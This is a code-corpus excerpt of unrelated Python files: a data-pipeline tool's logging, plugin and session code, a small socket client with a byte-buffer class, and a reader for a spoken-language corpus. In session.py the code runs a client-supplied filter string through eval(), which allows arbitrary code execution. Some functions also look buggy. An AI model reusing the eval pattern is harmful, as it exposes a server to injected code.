tq = re.search(r'(([^:]+): ?)?([0-9]+)%\|[^\|]+\| ?([0-9GKMT]+)\/([0-9GKMT]+) ?\[([0-9:]+)<([0-9:]+), ?([^\]]+)', data.replace('\r', ''))
if tq:
desc = tq.group(2)
if desc is None: desc = "In progress"
progress = float(tq.group(4)) / float(tq.group(5))
ellipsed = tq.group(6)
remain = tq.group(7)
speed = tq.group(8)
msg = "\\r%s: %.1f%%" % (desc, progress * 100)
if '\n' in data: msg += "\\n"
self.log.progress(msg, {
'progress': progress,
'ellipsed': ellipsed,
'remain': remain,
'speed': speed
})
else:
tq = re.search(r'(([^:]+): ?)?([0-9]+)%\|[^\|]+\| ?([0-9GKMT]+)\/([0-9GKMT]+) ?\[([0-9:]+)', data.replace('\r', ''))
if tq:
desc = tq.group(2)
if desc is None: desc = "In progress"
progress = float(tq.group(4)) / float(tq.group(5))
ellipsed = tq.group(6)
msg = "\\r%s: %.1f%%" % (desc, progress * 100)
self.log.progress(msg, {
'progress': progress,
'ellipsed': ellipsed,
})
else:
self.log.stream(3, repr(data))
def flush(self):
pass
class LogRedirect:
#out_redirected = False
def __init__(self, log:Logger):
# self.log = log
self.stdout = redirect_stdout(outwriter(log))
self.stderr = redirect_stderr(errwriter(log))
def __enter__(self):
LogRedirect.out_redirected += 1
# self.log.working("out_redirected")
self.stderr.__enter__()
self.stdout.__enter__()
def __exit__(self, exctype, excinst, exctb):
self.stderr.__exit__(exctype, excinst, exctb)
self.stdout.__exit__(exctype, excinst, exctb)
LogRedirect.out_redirected -= 1
if LogRedirect.out_redirected < 0: LogRedirect.out_redirected = 0
# self.log.working("out_not_redirected %r" % LogRedirect.out_redirected)
LogRedirect.out_redirected = 0
``` |
{
"source": "johnwcchau/libretto",
"score": 2
} |
#### File: libretto/plugin/__init__.py
```python
import logging
from configparser import ConfigParser
from typing import Callable
__plugins = {}
def plugin_disabled(config, path):
name = '.'.join(path.replace('/', '.').replace('\\', '.').split('.')[:-2])
return config.getboolean(name, "disabled", fallback=False)
def plugin_mjs(config):
from glob import glob
with open("libretto/plugin/plugins.mjs", "w") as file:
for path in glob("libretto/plugin/**/__init__.mjs"):
if plugin_disabled(config, path): continue
path = path[8:].replace("\\", "/")
name = path.split('/')[-2]
file.write(f'import {{}} from "{path}";\n');
file.write("""
export default function plugin_css() {
""")
for name in glob("libretto/plugin/**/__init__.css"):
name = name[4:].replace("\\", "/")
file.write(f"""
$("head").append('<link rel="stylesheet" href="{name}" type="text/css" />');
""")
file.write("""
}""")
def init(config):
from importlib import import_module
from os import path
import logging
from glob import glob
global __plugins
for path in glob("libretto/plugin/**/__init__.py"):
name = '.'.join(path.replace('/', '.').replace('\\', '.').split('.')[:-2])
logging.info(f'Discovered plugin {name}')
if plugin_disabled(config, path):
logging.info(f'{name}: Disabled in config and not loaded')
continue
try:
lib = import_module(f'{name}.__init__')
if hasattr(lib, "__init_plugin"):
getattr(lib, "__init_plugin")(config)
__plugins[name] = lib
except Exception as e:
logging.error(repr(e))
def dispatch(lamda:Callable[[str, object], None]):
global __plugins
for name, plugin in __plugins.items():
lamda(name, plugin)
def find_plugin(plugin:str):
global __plugins
return __plugins[plugin] if plugin in __plugins else None
```
#### File: plugin/transformer/block.py
```python
from sentence_transformers import SentenceTransformer
from umap import UMAP
import hdbscan
import pandas as pd
from libretto.baseblock import Block, ErrorAtRun, Parent, Loop, RunSpec
from libretto.inout import StdRedirect
#
# cache models
#
models = {}
class TransformerBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.model_name = kwargs["model"] if "model" in kwargs else None
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if len(x.columns) > 1:
raise ValueError("input must be a single column of text")
x = x[x.columns[0]]
if x.hasnans:
raise ValueError("input contains empty value, please drop or impute")
if self.model is None:
global models
if self.model_name in models:
self.model = models[self.model_name]
else:
runspec.out.working(f'Create embedding model {self.model_name}', {"atblock": self.name})
with StdRedirect(runspec.out, atblock=self.name):
import torch
device = "cuda" if torch.cuda.is_available() else "cpu"
runspec.out.working(f'Embedding to be done on {device}', {"atblock": self.name})
self.model = SentenceTransformer(self.model_name, device=device)
models[self.model_name] = self.model
#
# Encoding is slow, try best to cache
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.previews = self.model.encode(x.values.tolist(), show_progress_bar=True)
result = self.previews
else:
result = self.model.encode(x.values.tolist(), show_progress_bar=True)
return pd.DataFrame(result), y, id
class UMAPBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.umap_param = kwargs["umap_param"] if "umap_param" in kwargs else None
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if self.model is None:
with StdRedirect(runspec.out, atblock=self.name):
self.model = UMAP(**self.umap_param)
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.model.fit(x.values.tolist(), y)
self.previews = pd.DataFrame(self.model.transform(x.values.tolist()))
result = self.previews
else:
if runspec.mode not in [RunSpec.RunMode.TEST, RunSpec.RunMode.RUN]:
self.model.fit(x.values.tolist(), y)
result = pd.DataFrame(self.model.transform(x.values.tolist()))
return result, y, id
class HDBSCANBlock(Block):
def __init__(self, **kwargs: dict) -> None:
super().__init__(**kwargs)
self.kwargs = kwargs
self.initkargs = kwargs["initkargs"] if "initkargs" in kwargs else {}
self.model = None
self.previews = None
def dump(self) -> dict:
return self.kwargs
def run(self, runspec: RunSpec, x: pd.DataFrame, y=None, id=None) -> tuple:
if self.model is None:
self.model = hdbscan.HDBSCAN(**self.initkargs)
if runspec.mode in [RunSpec.RunMode.PREVIEW, RunSpec.RunMode.COLUMNS]:
if self.previews is None:
self.model.fit(x.values.tolist())
self.previews = pd.DataFrame({0: self.model.labels_})
result = self.previews
elif runspec.mode == RunSpec.RunMode.TRAIN:
self.model.fit(x.values.tolist())
result = pd.DataFrame({0: self.model.labels_})
else:
result, _ = hdbscan.approximate_predict(self.model, x.values.tolist())
result = pd.DataFrame(result)
return result, y, id
```
#### File: libretto/libretto/session.py
```python
import traceback
from .baseblock import Block, ErrorAtRun, RunSpec, EvalLocals
from .inout import Output
from .plugin import dispatch, find_plugin
import pandas as pd
import numpy as np
import logging
import re
class Session:
__sessions = {}
def __new__(cls, name:str):
if name not in Session.__sessions:
logging.info(f'Creating new session {name}')
s = object.__new__(Session)
s.__init(name)
Session.__sessions[name] = s
dispatch(lambda _, obj: getattr(obj, "__new_session")(name) if hasattr(obj, "__new_session") else None)
else:
s = Session.__sessions[name]
return s
def __init(self, name:str) -> None:
self.name = name
self.rootblock:Block = None
self.out:Output = Output()
self.runspec:RunSpec = None
self._result:tuple = None
def _attach(self, ws):
if self.out.ws is not None and self.out.ws != ws:
raise RuntimeError(f'Session is occupied')
self.out.ws = ws
def _detach(self):
self.out.ws = None
def plugin_invoke(self, plugin:str, action:str, **params):
try:
if action.startswith("__"):
self.out.invalid()
return
plugin = find_plugin(plugin)
if plugin is None or not hasattr(plugin, action):
self.out.invalid()
return
action = getattr(plugin, action)
if not callable(action):
self.out.invalid()
return
action(session=self.name, writer=self.out, **params)
except Exception as e:
logging.err(repr(e))
self.out.error(repr(e))
def run(self, mode:str, upto:str, **kwargs)->None:
try:
if self.rootblock is None:
raise RuntimeError('No receipe')
self.out.working(f'{mode} upto {upto if upto else "end"}...')
self.runspec = RunSpec(mode=RunSpec.RunMode[mode.upper()], upto=upto, out=self.out)
self._result = self.rootblock(self.runspec, None)
self.out.finished("Finished")
except ErrorAtRun as e:
logging.exception(e.exception, exc_info=True)
self.out.error(repr(e.exception), {"atblock": e.at.name})
except Exception as e:
logging.exception(e, exc_info=True)
self.out.error(repr(e))
def __genstat(self):
data:pd.DataFrame = self._result[0]
result:pd.DataFrame = data.describe(include="all")
def fillunique(x:pd.Series):
if "unique" in x and np.isnan(x["unique"]):
x["unique"] = len(data[x.name].unique())
return x
result = result.transform(fillunique, axis=0)
try:
if self._result[1] is not None:
result.loc[len(result.index)] = data.corrwith(self._result[1])
result = result.rename(index={
len(result.index)-1 : "corr"
})
except TypeError:
pass
result.loc[len(result.index)] = data.median()
result.loc[len(result.index)] = data.skew()
result.loc[len(result.index)] = data.dtypes.astype(str)
result = result.rename(index={
len(result.index)-3 : "median",
len(result.index)-2 : "skew",
len(result.index)-1 : "dtype",
}).transpose().reset_index().rename(columns={"index": "column"})
return result.where(pd.notnull(result), None).to_dict(orient="records")
def formatforplotly(self, result:pd.DataFrame, plotspec:list):
traces = []
for spec in plotspec:
datapts = result
if "filter" in spec:
if spec["filter"]:
datapts = datapts.query(spec["filter"])
del spec["filter"]
if "groupby" in spec and len(spec["groupby"]):
datagroups = datapts.groupby(spec["groupby"])
else:
if "groupby" in spec:
del spec["groupby"]
def v():
yield "", datapts
datagroups = v()
#
# seperate const, aggr and cols
#
cols = []
aggr = {}
dims = spec['dims']
def setfor(obj, name:str, val):
names:list = name.split('.')
while len(names) > 1:
n = names.pop(0)
if not n in obj:
obj[n] = {}
obj = obj[n]
obj[names[0]] = val
for dim in dims:
if dim["type"] == "constant":
setfor(spec, dim["name"], dim["val"])
elif dim["type"] == "column":
cols.append(dim["val"])
elif dim["type"] == "sum":
aggr[dim["val"]] = "sum"
del spec["dims"]
for v in datagroups:
group:pd.DataFrame = v[1]
trace = {i:v for i,v in spec.items()}
if v[0]:
trace["name"] = f'{trace["name"]}#{v[0]}'
if len(aggr) > 0:
group = group.groupby(cols).aggregate(aggr).reset_index()
else:
group = group[cols]
for dim in dims:
if dim["type"] in ["column", "sum"]:
setfor(trace, dim["name"], group[dim["val"]].to_list())
traces.append(trace)
self.out.finished("Result ready", {
"traces": traces
})
def result(self, usage:str="table", query:str=None, **kwargs)->None:
try:
if usage=='stat':
self.out.finished("Listed stats", {"stat": self.__genstat()})
return
elif usage=='variables':
self.out.finished("Listed variables", {"variables": self.runspec.variables})
if self._result is None:
raise RuntimeError('No result, run first')
result = self._result[0]
if not isinstance(result, pd.DataFrame):
result = pd.DataFrame(result)
if usage=='columns':
self.out.finished("Listed columns", {"columns": [(c, str(result[c].dtype)) for c in result.columns]})
return
if self._result[1] is not None:
result["__Y__"] = self._result[1].values
if self._result[2] is not None:
result["__ID__"] = self._result[2].values
if usage=="plotly" and 'plotspec' in kwargs:
#
# go return data for plotting
#
return self.formatforplotly(result, kwargs['plotspec'])
if query is not None and query != '':
mask = result.apply(lambda x: eval(query, globals(), EvalLocals(x=x, X=result, v=self.runspec.variables)), axis=1)
result = result[mask]
#result = result.query(query)
#
# limit result to 1000 for table
#
warning = None
if result.shape[0] > 1000 and usage == "table":
count = result.shape[0]
result = result.sample(n=1000)
warning = f'Limited to 1000 out of {count} records, or use filtering to find desired records'
self.out.finished("Result ready", {
"data": result.where(pd.notnull(result), None).to_dict(orient="records"),
"variables": self.runspec.variables,
"warning": warning
})
except Exception as e:
traceback.print_exc()
self.out.error(repr(e))
def dump(self, **kwargs)->None:
try:
if self.rootblock is None:
self.out.finished("No receipe", {"receipe": None})
else:
self.out.finished("Receipe ready", {"receipe": self.rootblock.dump()})
except Exception:
traceback.print_exc()
self.out.error("Corrupted receipe")
def load(self, dump:dict, **kwargs)->None:
try:
self.rootblock = Block.load(dump)
self.out.finished("Receipe loaded")
except Exception as e:
traceback.print_exc()
self.out.error(f'Receipe load error: {repr(e)}')
def export(self, path:str=None, **kwargs)->None:
if not path:
self.out.invalid()
return
if not self.rootblock:
self.out.invalid()
return
try:
from libretto.fileio import FileIO
import joblib
vpath, valid = FileIO()._getvalidpath(path)
if not valid:
self.out.error(f'{path} is not valid')
return
with open(vpath, "wb") as f:
joblib.dump(self.rootblock, f)
self.out.finished(f'Exported to {vpath}')
except Exception as e:
traceback.print_exc()
self.out.error(f'Export failed: {repr(e)}')
# %%
``` |
{
"source": "johnwdubois/rezonator_v2",
"score": 3
} |
#### File: Python Socket Test/datafiles/client.py
```python
import socket
import struct
import pytogmlnetw
def send_message_string(mess,data):
buffer.clear();
buffer.write_byte(mess)
buffer.write_bstring(data)
s.send(buffer)
def send_message_int(mess,data):
buffer.clear();
buffer.write_byte(mess)
buffer.write_int(data)
s.send(buffer)
TCP_IP = '192.168.0.101'
TCP_PORT = 5001
print("port " + str(TCP_PORT))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
buffer = pytogmlnetw.Buffer();
state="logging"
name="";
result=0;
while True:
buffer.clear();
if state=="logging":
name=input("your name?");
send_message_string(1,name)
buffer.clear();
msg,(addr,port)=s.recvfrom(4096)
buffer.clear()
if msg:
buffer.load(msg);
msg_code=buffer.read_ubyte();
if msg_code==1:
data=buffer.read_int();
print("My ID: "+str(data))
state="chatting"
```
#### File: Python Socket Test/datafiles/pytogmlnetw.py
```python
import struct
import binascii
class Buffer(bytearray):
index = 0
length=0;
def __init__(self, message=""):
self[:] = bytearray()#message.encode()
def get_readpos(self):
return self.index
def set_readpos(self, i):
self.index = i
def clear(self):
self.index = 0
self[:] = bytearray();
def load(self, message=""):
self[:] = bytearray(message)
self.index = 0
def read_ubyte(self):
ubyte = self[self.index:self.index+1]
self.index += 1
return struct.unpack("!B", bytes(ubyte))[0]
def read_byte(self):
byte = self[self.index:self.index+1]
self.index += 1
return struct.unpack("!b", bytes(byte))[0]
def read_ushort(self):
ushort = self[self.index:self.index+2]
self.index += 2
return struct.unpack("!H", bytes(ushort))[0]
def read_short(self):
short = self[self.index:self.index+2]
self.index += 2
return struct.unpack("!h", bytes(short))[0]
def read_uint(self):
uint = self[self.index:self.index+4]
print(uint)
self.index += 4
#return struct.unpack("!I", bytes(uint))[0]
i=int.from_bytes(uint, byteorder='big', signed=False)
print(i)
return i;
def read_int(self):
global length;
length=0;
integer = self[self.index:self.index+4]
for i in integer:
if i!=0:
length+=1;
#print(i)
integer = self[self.index:self.index+length]
#print(self.index)
if length==1:
self.index += 1
#print(self.index)
return int.from_bytes(integer, byteorder='big', signed=True)#struct.unpack("h", bytes(integer))[0]
if length==2:
self.index += 2
#print(self.index)
return struct.unpack("h", bytes(integer))[0]
if length==3:
self.index += 3
#print(self.index)
return struct.unpack("BH", bytes(integer))[0]
if length==4:
self.index += 4
#print(self.index)
return struct.unpack("I", bytes(integer))[0]
def read_float(self):
fl = self[self.index:self.index+4]
self.index += 4
return struct.unpack("!f", str(fl))[0]
def read_double(self):
db = self[self.index:self.index+8]
self.index += 8
return struct.unpack("!d", str(db))[0]
def read_string(self, length):
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def read_bstring(self):
length = struct.unpack("!B",str(self[self.index:self.index+1]))[0]
self.index += 1
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+bytearray("s"), str(string))[0]
def read_sstring(self):
length = struct.unpack("!H",str(self[self.index:self.index+2]))[0]
self.index += 2
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def read_istring(self):
length = struct.unpack("!I",str(self[self.index:self.index+4]))[0]
self.index += 4
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def write_ubyte(self, ubyte):
self += struct.pack("=B", ubyte)
return len(self)
def write_byte(self, byte):
self += struct.pack("=b", byte)
return len(self)
def write_ushort(self, ushort):
self += struct.pack("=H", ushort)
return len(self)
def write_short(self, short):
self += struct.pack("=h", short)
return len(self)
def write_uint(self, uint):
self += struct.pack("=I", uint)
return len(self)
def write_int(self, integer):
self += struct.pack("=i", integer)
return len(self)
def write_float(self, fl):
self += struct.pack("=f", fl)
return len(self)
def write_double(self, db):
self += struct.pack("=d", db)
return len(self)
def write_string(self, string):
self += struct.pack("="+str(len(string))+"s", str(string))
return len(self)
def write_bstring(self, string):
string=bytes(string,encoding='utf-8')
self += struct.pack("="+str(len(string))+"s",string)
return len(self)
def write_sstring(self, string):
self += struct.pack("=H", len(string))
self += struct.pack("="+str(len(string))+"s", str(string))
return len(self)
def write_istring(self, string):
self += struct.pack("=I", len(string))
self += struct.pack("="+str(len(string))+"s", str(string))
return len(self)
```
#### File: SBCorpus-py/SBCorpus-py/reader.py
```python
import SBCorpus
from SBCorpus.metadata import metadata
import re
class SBCorpusReader():
def __init__(self):
#self.corpus = SBCorpus.xmlreader()
self.corpus = SBCorpus.corpus
self.positions={
'ID':0,
'NAME':1,
'GENDER':2,
'AGE':3,
'HOMETOWN':4,
'HOMESTATE':5,
'CURRENTSTATE':6,
'EDUCATION':7,
'YEARSEDUCATION':8,
'OCCUPATION':9,
'ETHNICITY':10,
'TEXTS':11
}
def copy_object(self, obj):
if type(obj) in (str,int,float):
output=obj
elif type(obj)==list:
output=[]
for item in obj:
output+=[self.copy_object(item)]
elif type(obj)==tuple:
output=[]
for item in obj:
output+=[self.copy_object(item)]
output=tuple(output)
elif type(obj)==dict:
output={}
for key in list(obj):
output[key]=self.copy_object(obj[key])
return output
def copy_part(self, output, source, text=None, turn=None, IU=None, word=None, tiers=None):
if text != None:
if turn != None:
if text not in output:
output[text] = {'name':source[text]['name']}
if IU != None:
if turn not in output[text]:
output[text][turn] = {'ID':source[text][turn]['ID']}
if word != None:
if IU not in output[text][turn]:
output[text][turn][IU] = {'start':source[text][turn][IU]['start'], 'end':source[text][turn][IU]['end']}
if tiers != None:
if word not in output[text][turn][IU]:
output[text][turn][IU][word] = {}
for tier in tiers:
if word not in output[text][turn][IU][word]:
output[text][turn][IU][word][tier] = self.copy_object(source[text][turn][IU][word][tier])
elif tiers == None:
output[text][turn][IU][word] = self.copy_object(source[text][turn][IU][word])
elif word == None:
output[text][turn][IU] = self.copy_object(source[text][turn][IU])
elif IU == None:
output[text][turn] = self.copy_object(source[text][turn])
elif turn == None:
output[text] = self.copy_object(source[text])
elif text == None:
output = self.copy_object(source)
return output
def get_range(self, terms):
if ':' in terms:
nrange=[]
for i in range(int(terms.split(':')[0]),int(terms.split(':')[1])+1):
nrange.append(i)
terms = nrange
else:
if re.match('^\d*$', terms) == None:
terms = [terms]
else:
terms = [int(terms)]
return terms
def get_parameters(self, identifier, negative=False, capsearch=True):
identifiers = {}
remove = {}
if type(identifier) in [list,tuple]:
return identifier
elif type(identifier) in [int, float]:
return [identifier]
if ',' in identifier:
identifier = identifier.split(',')
elif type(identifier) == str:
identifier = [identifier]
for parameter in identifier:
if '!=' in parameter:
search,terms = parameter.split('!=')
if capsearch == True:
search = search.upper()
terms = self.get_range(terms)
if search not in remove:
remove[search] = terms
else:
remove[search] += terms
elif '=' in parameter:
search,terms = parameter.split('=')
if capsearch == True:
search = search.upper()
terms = self.get_range(terms)
if search not in identifiers:
identifiers[search] = terms
else:
identifiers[search] += terms
else:
if 'generic' not in identifiers:
identifiers['generic'] = self.get_range(parameter)
else:
identifiers['generic'] += self.get_range(parameter)
if 'generic' in identifiers:
return identifiers['generic']
else:
if negative == True:
return identifiers, remove
else:
return identifiers
def generator(self, extract, level):
output = []
for text in extract:
if type(text) == int:
if level == 'text':
output += [text]
else:
for turn in extract[text]:
if type(turn) == int:
if level == 'turn':
output += [(text, turn)]
else:
for IU in extract[text][turn]:
if type(IU) == int:
if level == 'IU':
output += [(text, turn, IU)]
else:
for word in extract[text][turn][IU]:
if type(word) == int:
if level == 'word':
output += [(text, turn, IU, word)]
output.sort()
return output
def getParticipants(self, identifier='all', info='all'):
if identifier != 'all':
identifiers,remove = self.get_parameters(identifier, negative=True)
containing = []
outtakes=[]
for key in identifiers:
for participant in metadata:
for term in identifiers[key]:
pos = participant[self.positions[key]]
if type(pos) in [int,float,str]:
if term == pos:
containing.append(participant)
elif type(pos) in [list,tuple]:
if term in pos:
containing.append(participant)
else:
outtakes.append(participant)
output = []
for participant in containing:
for key in remove:
for term in remove[key]:
pos = participant[self.positions[key]]
if type(pos) in [int,float,str]:
if term == pos:
outtakes.append(participant)
elif type(pos) in [list,tuple]:
if term in pos:
outtakes.append(participant)
else:
output=[]
outtakes=[]
containing = self.copy_object(metadata)
for participant in containing:
if participant not in outtakes:
output += [participant]
if info == 'all':
return output
else:
output = [x[self.positions[info]] for x in output]
newoutput = []
for element in output:
if type(element) == list:
newoutput += [e for e in element if e not in newoutput]
elif element not in newoutput:
newoutput += [element]
return newoutput
def printParticipants(self, identifier):
participants = self.getParticipants(identifier, info='all')
output = []
for key in self.positions:
output.append(key)
for participant in participants:
for key in output:
value = participant[self.positions[key]]
if type(value) in [int,float]:
value = str(value)
elif type(value) == list:
value = ', '.join([str(v) for v in value])
print (key+': '+value)
print()
def format_time(self, flt, decimal=3):
output = str(flt)
if decimal > 0:
if '.' not in output:
output += '.'
before = output.split('.')[0]
after = output.split('.')[1]
zeros = decimal - len(after)
if zeros >= 0:
output += '0'*zeros
return output
elif zeros < 0:
if int(after[zeros]) < 5:
return output[:zeros]
else:
after = str(int(after[:zeros])+1)
if len(after) > decimal:
return str(int(before)+1) + '.' + after[1:]
else:
return before + '.' + after
def getTexts(self, subset=None, textlist='all', participants='all'):
if subset == None:
subset = self.copy_object(self.corpus)
output = {}
if textlist != 'all':
textlist = self.get_parameters(textlist)
else:
textlist = [i for i in range(1,61)]
if participants == 'all':
ppl = self.getParticipants(info='ID')
ppl = self.getParticipants(participants, 'TEXTS')
for txt in textlist:
if txt in ppl and txt in subset:
output[txt] = self.copy_object(subset[txt])
return output
def getTurns(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='any', afterTurn='any', beforeTurn='any', offset=0, before='any', after='any', at='any', minlength='any', maxlength='any'):
subset = self.getTexts(subset=subset, textlist=textlist, participants=participants)
if (containing,IUlist) != ('any','all'):
IUs = self.getIUs(subset=subset, IUlist=IUlist, containing=containing)
else:
IUs=subset
list(IUs)
turns = {}
for text,turn in self.generator(IUs, 'turn'):
turns = self.copy_part(turns, subset, text, turn)
output = {}
if afterTurn != 'any':
turns_after = {}
for text,turn in self.generator(afterTurn, 'turn'):
if text in turns:
if turn+1 in turns[text]:
turns_after = self.copy_part(turns_after, turns, text, turn+1)
turns = turns_after
del turns_after
if beforeTurn != 'any':
turns_before = {}
for text,turn in self.generator(beforeTurn, 'turn'):
if text in turns:
if turn-1 in turns[text]:
turns_before = self.copy_part(turns_before, turns, text, turn-1)
turns = turns_before
del turns_before
IDs = [0] + self.getParticipants(participants, 'ID')
if turnlist != 'all':
turnlist = self.get_parameters(turnlist)
for text,turn in self.generator(turns,'turn'):
accept = True
if turn+offset in turns[text]:
if turns[text][turn]['ID'] not in IDs:
accept = False
if turnlist != 'all':
if turn + offset not in turnlist:
accept = False
ius = [iu for iu in turns[text][turn+offset] if (type(iu) == int)]
if ius != []:
start = turns[text][turn+offset][min(ius)]['start']
end = turns[text][turn+offset][max(ius)]['end']
if type(maxlength) in [int, float]:
if end - start > maxlength:
accept = False
if type(minlength) in [int, float]:
if end - start < minlength:
accept = False
if type(at) in [int, float]:
if at < start or at > end:
accept = False
if type(after) in [int, float]:
if start < after:
accept = False
if type(before) in [int, float]:
if end > before:
accept = False
elif (maxlength,minlength,at,after,before) != ('any','any','any','any','any'):
accept = False
print(ius)
else:
accept = False
if accept == True:
output = self.copy_part(output,turns,text,turn+offset)
return output
def getIUs(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='any', after='any', at='any', before='any', maxlength='any', minlength='any'):
subset = self.getTexts(subset=subset,participants=participants,textlist=textlist)
if (turnlist,participants) != ('any','all'):
subset = self.getTurns(subset, turnlist=turnlist, participants=participants)
IUs = {}
if containing != 'any':
words = self.getWords(subset=subset,containing=containing)
for text,turn,IU in self.generator(words,'IU'):
IUs = self.copy_part(IUs, subset, text, turn, IU)
subset = IUs
del IUs
output={}
if IUlist != 'all':
IUlist = self.get_parameters(IUlist)
for text,turn,IU in self.generator(subset, 'IU'):
iu = subset[text][turn][IU]
accept = True
if IUlist != 'all':
if IU not in IUlist:
accept = False
if type(maxlength) in [int, float]:
if iu['end'] - iu['start'] > maxlength:
accept = False
if type(minlength) in [int, float]:
if iu['end'] - iu['start'] < minlength:
accept = False
if type(at) in [int, float]:
if at < iu['start'] or at > iu['end']:
accept = False
if type(after) in [int, float]:
if iu['start'] < after:
accept = False
if type(before) in [int, float]:
if iu['end'] > before:
accept = False
if accept == True:
output = self.copy_part(output, subset, text, turn, IU)
return output
def getWords(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='all', tier='dt', aslist=False, unit='word', fromstart='any', fromend='any'):
output = {}
subset = self.getIUs(subset=subset, textlist=textlist, turnlist=turnlist, IUlist=IUlist, participants=participants)
if containing != 'all':
containing,remove = self.get_parameters(containing, negative=True)
for text,turn,IU,word in self.generator(subset, 'word'):
accept = True
if type(fromstart) == int:
if word > fromstart:
accept = False
if type(fromend) == int:
for i in range(0,fromend):
if word+i not in subset[text][turn][IU]:
accept = False
if containing != 'all':
for search in containing:
for term in containing[search]:
if search.lower() in ['dt','word']:
if term[0:2] == "r'" and term[-1] == "'":
if re.match(term[2:-1],subset[text][turn][IU][word][search.lower()]) == None:
accept = False
elif term != subset[text][turn][IU][word][search.lower()]:
accept = False
elif search.lower() == 'manner':
if term not in subset[text][turn][IU][word]['manner'] and term.upper() not in subset[text][turn][IU][word]['manner']:
accept = False
elif search == 'POS':
if term != subset[text][turn][IU][word]['POS']:
accept = False
for search in remove:
for term in remove[search]:
if search.lower() in ['dt','word']:
if term[0:2] == "r'" and term[-1] == "'":
if re.match(term[2:-1],subset[text][turn][IU][word][search.lower()]) != None:
accept = False
elif term == subset[text][turn][IU][word][search.lower()]:
accept = False
elif search.lower() == 'manner':
if term not in subset[text][turn][IU][word]['manner'] and term.upper() not in subset[text][turn][IU][word]['manner']:
accept = False
elif search == 'POS':
if term != subset[text][turn][IU][word]['POS']:
accept = False
if accept == True:
output = self.copy_part(output, subset, text, turn, IU, word)
if aslist == True:
if unit == 'IU':
output = self.listWords(output, tier=tier, IUs=True)
elif unit == 'word':
output = self.listWords(output, tier=tier, IUs=False)
return output
def combineSubsets(self, excerpt1, excerpt2=None):
if type(excerpt1) == list:
output = self.copy_object(excerpt1[0])
for subset in excerpt1[1:]:
for text,turn,IU,word in self.generator(subset, 'word'):
output = self.copy_part(output,subset,text,turn,IU,word)
elif type(excerpt1) == dict and excerpt2 != None:
output = self.copy_object(excerpt1)
for text,turn,IU,word in self.generator(excerpt2, 'word'):
output = self.copy_part(output,excerpt2,text,turn,IU,word)
return output
def getWindow(self, subset='all', castunit='IU', outputunit='IU', size=10, shift=5):
output = {}
complete = [0]
if subset == 'all':
subset = self.getTexts()
if castunit in ['millisecond', 'ms']:
size = float(size)/1000.000
shift = float(shift)/1000.000
minus = 0.001
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit in ['second', 's']:
minus = 1.000
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit in ['minute', 'm']:
size = float(size)*60.000
shift = float(shift)*60.000
minus = 60.000
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit == 'word':
if outputunit == 'IU':
words = self.getWindow(subset=subset, castunit=castunit, outputunit='word', size=size, shift=shift)
for window in range(0,len(words)):
if window+1 not in output:
output[window+1] = {}
for text,turn,iu in self.generator(words[window], 'IU'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn, iu)
elif outputunit == 'turn':
words = self.getWindows(subset=subset, castunit=castunit, outputunit='word', size=size, shift=shift)
for window in range(0,len(words)):
if window+1 not in output:
output[window+1] = {}
for text,turn in self.generator(words[window], 'turn'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn)
elif castunit == 'IU':
if outputunit == 'turn':
IUs = self.getWindows(subset=subset, castunit=castunit, outputunit='IU', size=size, shift=shift)
for window in range(0,len(IUs)):
if window+1 not in output:
output[window+1] = {}
for text,turn in self.generator(IUs[window], 'turn'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn)
if outputunit == 'word':
return self.getWindow(subset=subset, castunit=castunit, outputunit='IU', size=size, shift=shift)
elif castunit == 'turn':
if outputunit in ('IU','word'):
return self.getWindow(subset=subset, castunit=castunit, outputunit='turn', size=size, shift=shift)
point = size
for text in self.generator(subset,'text'):
if outputunit == 'word':
if castunit == 'word':
complete = [0]
wordno=0
for txt,trn,iu,wd in self.generator({text:subset[text]},'word'):
end = False
i = max(complete)+1
while end == False:
number = size*2
if i not in output:
output[i] = {}
isize = len(self.listWords(words=output[i], IUs=False))
point = size + ((i-1) * shift)
if number == isize or wordno > size + ((i-1) * shift) + size:
complete.append(i)
elif point + size >= wordno and point - size <= wordno:
output[i] = self.copy_part(output[i], subset, text, trn, iu, wd)
else:
end = True
i+=1
wordno += 1
elif outputunit == 'IU':
i = 1
end = False
if castunit == 'IU':
while end == False:
minIU = str(point - size)
maxIU = str(point + size - 1)
IUrange = ':'.join([minIU,maxIU])
window = self.getIUs(subset=subset,textlist=text,IUlist=IUrange)
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
elif castunit == 's':
while end == False:
minIU = point - size
maxIU = point + size - minus
window = self.combineSubsets([self.getIUs(subset=subset,textlist=text,after=minIU,before=maxIU),
self.getIUs(subset=subset,textlist=text,at=minIU),
